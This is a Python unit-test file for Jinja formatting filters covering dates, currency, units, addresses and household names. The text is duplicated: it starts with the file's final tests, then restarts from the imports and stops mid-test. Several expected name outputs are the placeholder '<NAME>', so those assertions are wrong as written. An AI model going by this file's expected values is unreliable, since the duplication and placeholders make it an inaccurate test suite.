self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
def test_bad_day_of_week_offset_date_from_day(self):
with self.assertRaises(Exception):
calculate_offset_from_weekday_in_last_whole_week('2018-08-10', {}, 'BA')
def test_offset_date_defaults_to_now_if_date_not_passed(self):
with patch('app.jinja_filters.datetime') as mock_datetime:
# pylint: disable=unnecessary-lambda
mock_datetime.utcnow.return_value = datetime(2018, 8, 10)
mock_datetime.strftime.side_effect = lambda *args, **kw: datetime.strftime(*args, **kw)
result = calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU')
self.assertEqual(result, '2018-08-05')
def test_format_date_custom(self):
test_cases = [
# Input Date, date format, show year
('2018-08-14', 'EEEE d MMMM YYYY', 'Tuesday 14 August 2018'),
('2018-08-14', 'EEEE d MMMM', 'Tuesday 14 August'),
('2018-08-14', 'EEEE d', 'Tuesday 14'),
('2018-08-14', 'd MMMM YYYY', '14 August 2018'),
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_custom(self.autoescape_context, *case[0:2]),
"<span class='date'>{}</span>".format(case[2])
)
def test_format_date_range_no_repeated_month_year(self):
test_cases = [
# Start Date, End Date, Date Format, Output Expected First, Output Expected Second
('2018-08-14', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 14', 'Thursday 16 August 2018'),
('2018-07-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 31 July', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Sunday 31 December 2017', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'MMMM YYYY', 'December 2017', 'August 2018'),
('2018-08-14', '2018-08-16', 'MMMM YYYY', 'August 2018', 'August 2018'),
('2017-12-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2017-07-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2018-08-14', '2018-08-16', 'EEEE d', 'Tuesday 14', 'Thursday 16')
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_range_no_repeated_month_year(self.autoescape_context, *case[0:3]),
"<span class='date'>{}</span> to <span class='date'>{}</span>".format(case[3], case[4])
)
@patch('app.jinja_filters.format_unordered_list')
def test_format_repeated_summaries_unformatted(self, patched_format): # pylint: disable=no-self-use
test_cases = [
# (input list, expected output)
([['John', 'Smith'], [['Jane', 'Sarah'], ['Smith', 'Smythe']]], ['<NAME>', '<NAME>', '<NAME>']),
([['John', 'Smith']], ['<NAME>']),
([['John', 'Smith'], ['Andy', 'Smith'], ['David', 'Smith']], ['<NAME>', '<NAME>', '<NAME>']),
([[['Jane', 'Sarah'], ['Smith', 'Smith']]], ['<NAME>', '<NAME>']),
([[['David', 'Sarah'], ['Smith', 'Smith']]], ['<NAME>', '<NAME>']),
([[['David', 'Sarah'], ['', 'Smith']]], ['David', '<NAME>']),
([['John', 'Smith'], [[], []]], ['<NAME>'])
]
for case in test_cases:
format_repeating_summary(None, case[0])
# Format unordered list takes a list of lists
patched_format.assert_called_with(None, [[Markup(x) for x in case[1]]])
def test_format_repeated_summaries_no_input(self):
self.assertEqual('', format_repeating_summary(None, []))
def test_format_repeated_summaries_delimiters(self):
self.autoescape_context = Mock(autoescape=True)
output = format_repeating_summary(self.autoescape_context, [['', '51 Testing Gardens', '', 'Bristol', 'BS9 1AW']], delimiter=', ')
self.assertEqual(output, '<ul><li>51 Testing Gardens, Bristol, BS9 1AW</li></ul>')
def test_format_address_list_undefined_values(self):
user_entered_address = [Undefined(), Undefined(), Undefined(), Undefined(), Undefined()]
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_missing_values(self):
user_entered_address = ['44', 'Testing', '', 'Swansea', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Swansea',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_None_value(self):
user_entered_address = [None, None, None, None, None]
metadata_address = [None, None, None, None, None]
with self.assertRaises(Exception):
format_address_list(user_entered_address, metadata_address)
def test_format_address_list_no_values_in_answer(self):
user_entered_address = ['', '', '', '', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_no_metadata(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = []
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Gardens<br />Swansea<br />SA1 1AA',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_concatenated_list_no_values(self):
answer_address = ['', '', '']
metadata_address = ['', '', '']
with self.assertRaises(Exception) as error:
format_address_list(answer_address, metadata_address)
self.assertEqual('No valid address passed to format_address_list filter', error.exception.args[0])
| # coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
class TestJinjaFilters(AppContextTestCase): # pylint: disable=too-many-public-methods
def setUp(self):
self.autoescape_context = Mock(autoescape=True)
super(TestJinjaFilters, self).setUp()
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency_for_input(self):
self.assertEqual(format_currency_for_input('100', 2), '100.00')
self.assertEqual(format_currency_for_input('100.0', 2), '100.00')
self.assertEqual(format_currency_for_input('100.00', 2), '100.00')
self.assertEqual(format_currency_for_input('1000'), '1,000')
self.assertEqual(format_currency_for_input('10000'), '10,000')
self.assertEqual(format_currency_for_input('100000000'), '100,000,000')
self.assertEqual(format_currency_for_input('100000000', 2), '100,000,000.00')
self.assertEqual(format_currency_for_input(0, 2), '0.00')
self.assertEqual(format_currency_for_input(0), '0')
self.assertEqual(format_currency_for_input(''), '')
self.assertEqual(format_currency_for_input(None), '')
self.assertEqual(format_currency_for_input(Undefined()), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_get_currency_symbol(self):
self.assertEqual(get_currency_symbol('GBP'), '£')
self.assertEqual(get_currency_symbol('EUR'), '€')
self.assertEqual(get_currency_symbol('USD'), 'US$')
self.assertEqual(get_currency_symbol('JPY'), 'JP¥')
self.assertEqual(get_currency_symbol(''), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency(self):
self.assertEqual(format_currency(self.autoescape_context, '11', 'GBP'), "<span class='date'>£11.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '11.99', 'GBP'), "<span class='date'>£11.99</span>")
self.assertEqual(format_currency(self.autoescape_context, '11000', 'USD'), "<span class='date'>US$11,000.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0.00), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '', ), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, None), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, Undefined()), "<span class='date'></span>")
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_number(self):
self.assertEqual(format_number(123), '123')
self.assertEqual(format_number('123.4'), '123.4')
self.assertEqual(format_number('123.40'), '123.4')
self.assertEqual(format_number('1000'), '1,000')
self.assertEqual(format_number('10000'), '10,000')
self.assertEqual(format_number('100000000'), '100,000,000')
self.assertEqual(format_number(0), '0')
self.assertEqual(format_number(0.00), '0')
self.assertEqual(format_number(''), '')
self.assertEqual(format_number(None), '')
self.assertEqual(format_number(Undefined()), '')
def test_format_multilined_string_matches_carriage_return(self):
# Given
new_line = 'this is on a new\rline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_new_line(self):
# Given
new_line = 'this is on a new\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_carriage_return_new_line(self):
# Given
new_line = 'this is on a new\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string(self):
# Given
new_line = 'this is\ron a\nnew\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is<br>on a<br>new<br>line')
def test_format_multilined_string_auto_escape(self):
# Given
new_line = '<'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(str(format_value), '<')
def test_get_current_date(self):
# Given
date_format = '%-d %B %Y'
# When
format_value = get_current_date(self.autoescape_context)
current_date = as_london_tz(datetime.utcnow()).strftime(date_format)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=current_date))
def test_format_date(self):
# Given
date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_date_month_year(self):
# Given
date = '2017-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_markup(self):
# Given
date = [Markup('2017-01')]
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_non_string(self):
# Given
date = 123
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, 123)
def test_format_date_none(self):
# Given
date = None
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertIsNone(format_value)
def test_format_date_time_in_bst(self):
# Given
date_time = '2018-03-29T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>29 March 2018 at 12:59</span>")
def test_format_date_time_in_gmt(self):
# Given
date_time = '2018-10-28T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>28 October 2018 at 11:59</span>")
def test_format_conditional_date_not_date(self):
# Given no test for integers this check was removed from jinja_filters
invalid_input = [('1', None),
('1-1-1', None)]
# When
for nonsense in invalid_input:
date1 = nonsense[0]
date2 = nonsense[1]
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertIn("does not match format '%Y-%m'", str(exception.exception))
def test_format_conditional_date_not_set(self):
# Given
# When
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, None, None)
# Then
self.assertIn('No valid dates passed to format_conditional_dates filter', str(exception.exception))
def test_format_conditional_date(self):
# Given
datelist = [('2016-01-12', '2016-02-12', '12 January 2016'),
('2017-12-23', None, '23 December 2017'),
(None, '2017-12-24', '24 December 2017')]
# When
with self.app_request_context('/'):
for triple in datelist:
date1 = triple[0]
date2 = triple[1]
format_value = format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=triple[2]))
def test_calculate_years_difference(self):
with patch('app.setup.get_session_store', return_value=None):
# Given
ten_years_ago = (datetime.today()+relativedelta(years=-10)).strftime('%Y-%m-%d')
date_list = [('2017-01-30', '2018-01-30', '1 year'),
('2015-02-02', '2018-02-01', '2 years'),
('2016-02-29', '2017-02-28', '1 year'),
('2016-02-29', '2020-02-28', '3 years'),
(ten_years_ago, 'now', '10 years')]
for dates in date_list:
start_date = dates[0]
end_date = dates[1]
# When
calculated_value = calculate_years_difference(start_date, end_date)
# Then
self.assertEqual(calculated_value, dates[2])
def test_calculate_years_difference_none(self):
# Given
with self.assertRaises(Exception) as e:
# When
calculate_years_difference(None, '2017-01-17')
# Then
self.assertEqual('Valid date(s) not passed to calculate_years_difference filter', str(e.exception))
def test_format_date_range(self):
# Given
start_date = '2017-01-01'
end_date = '2017-01-31'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date, end_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span> to <span class='date'>31 January 2017</span>")
def test_format_date_range_missing_end_date(self):
# Given
start_date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_household_member_name(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_no_surname(self):
# Given
name = ['John', '']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_surname_is_none(self):
# Given
name = ['John', None]
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_no_first_name(self):
# Given
name = ['', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_name_is_none(self):
# Given
name = [None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_middle_and_last(self):
# Given
name = ['John', 'J', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_no_middle_name(self):
# Given
name = ['John', '', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_middle_name_is_none(self):
# Given
name = ['John', None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_trim_spaces(self):
# Given
name = ['John ', ' Doe ']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, '<NAME>')
def test_format_household_member_name_possessive(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, '<NAME>\u2019s')
def test_format_household_member_name_possessive_with_no_names(self):
# Given
name = [Undefined(), Undefined()]
# When
format_value = format_household_member_name_possessive(name)
self.assertIsNone(format_value)
def test_format_household_member_name_possessive_trailing_s(self):
# Given
name = ['John', 'Does']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, '<NAME>\u2019')
def test_concatenated_list(self):
# Given
list_items = ['1 The ONS', 'Newport', 'NP108XG']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_concatenated_list_one_entry(self):
# Given
list_items = ['One entry']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, 'One entry')
def test_concatenated_list_trim_white_spaces_and_trailing_commas(self):
# Given
list_items = ['', '1 The ONS ', 'Newport ', ' NP108XG', '']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_format_percentage(self):
self.assertEqual(format_percentage('100'), '100%')
self.assertEqual(format_percentage(100), '100%')
self.assertEqual(format_percentage(4.5), '4.5%')
def test_format_number_to_alphabetic_letter(self):
self.assertEqual(format_number_to_alphabetic_letter(0), 'a')
self.assertEqual(format_number_to_alphabetic_letter(4), 'e')
self.assertEqual(format_number_to_alphabetic_letter(25), 'z')
self.assertEqual(format_number_to_alphabetic_letter(-1), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit(self):
self.assertEqual(format_unit('length-meter', 100), '100 m')
self.assertEqual(format_unit('length-centimeter', 100), '100 cm')
self.assertEqual(format_unit('length-mile', 100), '100 mi')
self.assertEqual(format_unit('length-kilometer', 100), '100 km')
self.assertEqual(format_unit('area-square-meter', 100), '100 m²')
self.assertEqual(format_unit('area-square-centimeter', 100), '100 cm²')
self.assertEqual(format_unit('area-square-kilometer', 100), '100 km²')
self.assertEqual(format_unit('area-square-mile', 100), '100 sq mi')
self.assertEqual(format_unit('area-hectare', 100), '100 ha')
self.assertEqual(format_unit('area-acre', 100), '100 ac')
self.assertEqual(format_unit('volume-cubic-meter', 100), '100 m³')
self.assertEqual(format_unit('volume-cubic-centimeter', 100), '100 cm³')
self.assertEqual(format_unit('volume-liter', 100), '100 l')
self.assertEqual(format_unit('volume-hectoliter', 100), '100 hl')
self.assertEqual(format_unit('volume-megaliter', 100), '100 Ml')
self.assertEqual(format_unit('duration-hour', 100), '100 hrs')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 hours')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_welsh(self):
self.assertEqual(format_unit('duration-hour', 100), '100 awr')
self.assertEqual(format_unit('duration-year', 100), '100 bl')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 awr')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 mlynedd')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit_input_label(self):
self.assertEqual(format_unit_input_label('length-meter'), 'm')
self.assertEqual(format_unit_input_label('length-centimeter'), 'cm')
self.assertEqual(format_unit_input_label('length-mile'), 'mi')
self.assertEqual(format_unit_input_label('length-kilometer'), 'km')
self.assertEqual(format_unit_input_label('area-square-meter'), 'm²')
self.assertEqual(format_unit_input_label('area-square-centimeter'), 'cm²')
self.assertEqual(format_unit_input_label('area-square-kilometer'), 'km²')
self.assertEqual(format_unit_input_label('area-square-mile'), 'sq mi')
self.assertEqual(format_unit_input_label('area-hectare'), 'ha')
self.assertEqual(format_unit_input_label('area-acre'), 'ac')
self.assertEqual(format_unit_input_label('volume-cubic-meter'), 'm³')
self.assertEqual(format_unit_input_label('volume-cubic-centimeter'), 'cm³')
self.assertEqual(format_unit_input_label('volume-liter'), 'l')
self.assertEqual(format_unit_input_label('volume-hectoliter'), 'hl')
self.assertEqual(format_unit_input_label('volume-megaliter'), 'Ml')
self.assertEqual(format_unit_input_label('duration-hour'), 'hr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'hours')
self.assertEqual(format_unit_input_label('duration-year'), 'yr')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_input_label_welsh(self):
self.assertEqual(format_unit_input_label('duration-hour'), 'awr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'awr')
self.assertEqual(format_unit_input_label('duration-year'), 'bl')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'flynedd')
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
def test_get_question_title_with_title_value(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title'
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question'
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer',
'label': 'answer_label'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title',
'answers': [{
'id': 'answer'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer'
}]
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'default_question_title')
def test_offset_date_from_day(self):
test_cases = [
# (Input Date, offset, day of week, expected output)
('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday
('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday outputs previous Sunday (Must be a full Sunday)
('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday
('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset
('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous sunday with +1 month offset, back to input
('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday
('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input
('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks
('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs previous Friday + nothing
('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year
('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day
]
for case in test_cases:
self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
def test_bad_day_of_week_offset_date_from_day(self):
with self.assertRaises(Exception):
calculate_offset_from_weekday_in_last_whole_week('2018-08-10', {}, 'BA')
def test_offset_date_defaults_to_now_if_date_not_passed(self):
with patch('app.jinja_filters.datetime') as mock_datetime:
# pylint: disable=unnecessary-lambda
mock_datetime.utcnow.return_value = datetime(2018, 8, 10)
mock_datetime.strftime.side_effect = lambda *args, **kw: datetime.strftime(*args, **kw)
result = calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU')
self.assertEqual(result, '2018-08-05')
def test_format_date_custom(self):
test_cases = [
# Input Date, date format, show year
('2018-08-14', 'EEEE d MMMM YYYY', 'Tuesday 14 August 2018'),
('2018-08-14', 'EEEE d MMMM', 'Tuesday 14 August'),
('2018-08-14', 'EEEE d', 'Tuesday 14'),
('2018-08-14', 'd MMMM YYYY', '14 August 2018'),
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_custom(self.autoescape_context, *case[0:2]),
"<span class='date'>{}</span>".format(case[2])
)
def test_format_date_range_no_repeated_month_year(self):
test_cases = [
# Start Date, End Date, Date Format, Output Expected First, Output Expected Second
('2018-08-14', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 14', 'Thursday 16 August 2018'),
('2018-07-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 31 July', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Sunday 31 December 2017', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'MMMM YYYY', 'December 2017', 'August 2018'),
('2018-08-14', '2018-08-16', 'MMMM YYYY', 'August 2018', 'August 2018'),
('2017-12-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2017-07-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2018-08-14', '2018-08-16', 'EEEE d', 'Tuesday 14', 'Thursday 16')
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_range_no_repeated_month_year(self.autoescape_context, *case[0:3]),
"<span class='date'>{}</span> to <span class='date'>{}</span>".format(case[3], case[4])
)
@patch('app.jinja_filters.format_unordered_list')
def test_format_repeated_summaries_unformatted(self, patched_format): # pylint: disable=no-self-use
test_cases = [
# (input list, expected output)
([['John', 'Smith'], [['Jane', 'Sarah'], ['Smith', 'Smythe']]], ['<NAME>', '<NAME>', '<NAME>']),
([['John', 'Smith']], ['<NAME>']),
([['John', 'Smith'], ['Andy', 'Smith'], ['David', 'Smith']], ['<NAME>', '<NAME>', '<NAME>']),
([[['Jane', 'Sarah'], ['Smith', 'Smith']]], ['<NAME>', '<NAME>']),
([[['David', 'Sarah'], ['Smith', 'Smith']]], ['<NAME>', '<NAME>']),
([[['David', 'Sarah'], ['', 'Smith']]], ['David', '<NAME>']),
([['John', 'Smith'], [[], []]], ['<NAME>'])
]
for case in test_cases:
format_repeating_summary(None, case[0])
# Format unordered list takes a list of lists
patched_format.assert_called_with(None, [[Markup(x) for x in case[1]]])
def test_format_repeated_summaries_no_input(self):
self.assertEqual('', format_repeating_summary(None, []))
def test_format_repeated_summaries_delimiters(self):
self.autoescape_context = Mock(autoescape=True)
output = format_repeating_summary(self.autoescape_context, [['', '51 Testing Gardens', '', 'Bristol', 'BS9 1AW']], delimiter=', ')
self.assertEqual(output, '<ul><li>51 Testing Gardens, Bristol, BS9 1AW</li></ul>')
def test_format_address_list_undefined_values(self):
user_entered_address = [Undefined(), Undefined(), Undefined(), Undefined(), Undefined()]
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_missing_values(self):
user_entered_address = ['44', 'Testing', '', 'Swansea', '']
